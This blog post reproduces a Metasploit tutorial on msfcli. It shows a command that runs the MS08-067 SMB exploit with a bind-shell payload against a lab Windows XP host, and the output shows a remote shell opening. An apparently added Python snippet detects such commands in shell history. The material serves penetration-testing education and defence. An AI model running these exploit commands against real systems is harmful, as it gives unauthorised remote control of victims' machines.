Thursday, 25 February 2010

msfcli


Msfcli provides a powerful command-line interface to the framework.


Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.101:54659 -> 192.168.1.115:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


To display the payloads that are available for the current module, append the letter 'P' to the command-line string.

root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

Name                Description
----                -----------
generic/debug_trap  Generate a debug trap in the target process
...snip...

The other options available to msfcli are available by issuing 'msfcli -h'.
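
The syntax described above (module path, NAME=value assignments, trailing mode letter) is regular enough to parse mechanically when reviewing shell history or process-audit logs for msfcli use. The following is an added example, not code from the original page or from the Metasploit project; parse_msfcli, find_executions and the sample history are hypothetical names and constructed data.

```python
import shlex

# Mode letters shown on this page; 'msfcli -h' lists the others.
MODES = {"E": "execute", "O": "show options", "P": "show payloads"}

def parse_msfcli(line):
    """Return module, options and mode for an msfcli command line, else None."""
    try:
        tokens = shlex.split(line)
    except ValueError:            # unbalanced quote in a log line
        tokens = line.split()
    # Locate the executable even behind a prompt, sudo or a path prefix.
    idx = next((i for i, t in enumerate(tokens)
                if t.rsplit("/", 1)[-1] == "msfcli"), None)
    if idx is None:
        return None
    parsed = {"module": None, "options": {}, "mode": None}
    for arg in tokens[idx + 1:]:
        if "=" in arg:
            name, value = arg.split("=", 1)   # split once: values may hold '='
            parsed["options"][name] = value   # names kept as typed (case-sensitive)
        elif parsed["module"] is None:
            parsed["module"] = arg
        else:
            parsed["mode"] = arg
    mode = parsed["mode"]
    parsed["action"] = MODES.get(mode, "other") if mode else None
    return parsed

def find_executions(lines):
    """Return (line number, module, RHOST) for each msfcli run in execute mode."""
    hits = []
    for number, line in enumerate(lines, start=1):
        parsed = parse_msfcli(line)
        if parsed and parsed["mode"] == "E":
            hits.append((number, parsed["module"], parsed["options"].get("RHOST")))
    return hits

# Constructed shell-history sample; the msfcli commands are the ones on this page.
SAMPLE_HISTORY = [
    "cd /pentest/exploits/framework3",
    "./msfcli windows/smb/ms08_067_netapi O",
    "./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 P",
    "./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.115 PAYLOAD=windows/shell/bind_tcp E",
    "echo don't forget the report",
]

if __name__ == "__main__":
    for hit in find_executions(SAMPLE_HISTORY):
        print("line %d: module=%s target=%s" % hit)
```

Only the execute-mode line is reported; the 'O' and 'P' invocations are parsed but not flagged, since they only query the module.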

Benefits of msfcli:

  • Supports the launching of exploits and auxiliary modules
  • Useful for specific tasks
  • Good for learning
  • Convenient to use when testing or developing a new exploit
  • Good tool for one-off exploitation
  • Excellent if you know exactly which exploit and options you need
  • Wonderful for use in scripts and basic automation


The only real drawbacks of msfcli are that it is not supported quite as well as msfconsole and that it can only handle one shell at a time, making it rather impractical for client-side attacks. It also doesn't support any of the advanced automation features of msfconsole.

© Offensive Security 2009
